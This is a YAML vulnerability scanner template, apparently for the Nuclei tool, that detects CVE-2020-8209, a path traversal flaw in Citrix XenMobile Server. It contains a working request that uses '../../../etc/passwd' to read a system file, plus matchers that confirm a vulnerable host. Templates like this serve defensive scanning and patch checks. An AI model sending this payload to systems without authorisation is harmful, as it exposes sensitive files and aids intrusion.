52 lines
1.7 KiB
YAML
52 lines
1.7 KiB
YAML
id: CVE-2020-8209
|
|
|
|
info:
|
|
name: Citrix XenMobile Server - Local File Inclusion
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: |
|
|
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
|
|
reference:
|
|
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
|
|
- https://support.citrix.com/article/CTX277457
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Citrix to fix the vulnerability.
|
|
reference:
|
|
- https://support.citrix.com/article/CTX277457
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-8209
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97075
|
|
epss-percentile: 0.99685
|
|
cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: citrix
|
|
product: xenmobile_server
|
|
tags: cve,cve2020,citrix,lfi,xenmobile
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "fileDownload=true"
|
|
- "application/octet-stream"
|
|
- "attachment;"
|
|
condition: and
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
# digest: 4b0a00483046022100ab66af8d4c83a23b78454d287d028ba69ac0304ef598a7292bd0a3aed0ec3c7b022100a6d8eacb3f1e563ed11b2c2d0aecf6a39d0e0a53695a02a25e4828c51259321c:922c64590222798bb761d5b6d8e72950
|